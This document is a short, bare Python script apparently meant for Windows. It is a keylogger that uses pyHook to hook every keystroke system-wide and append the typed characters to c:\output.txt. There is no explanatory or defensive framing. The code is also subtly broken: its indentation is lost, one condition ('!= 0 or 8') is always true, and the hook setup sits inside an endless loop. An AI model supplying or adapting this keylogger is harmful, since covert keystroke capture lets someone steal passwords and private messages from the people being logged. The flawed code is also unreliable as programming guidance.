import win32api

import sys

import pythoncom, pyHook

buffer = ''

def OnKeyboardEvent(event):

if event.Ascii == 5:

sys.exit()

if event.Ascii != 0 or 8:

f = open ('c:\\output.txt', 'a')

keylogs = chr(event.Ascii)

if event.Ascii == 13:

keylogs = keylogs + '\n'

f.write(keylogs)

f.close()

while True:

hm = pyHook.HookManager()

hm.KeyDown = OnKeyboardEvent

hm.HookKeyboard()

pythoncom.PumpMessages()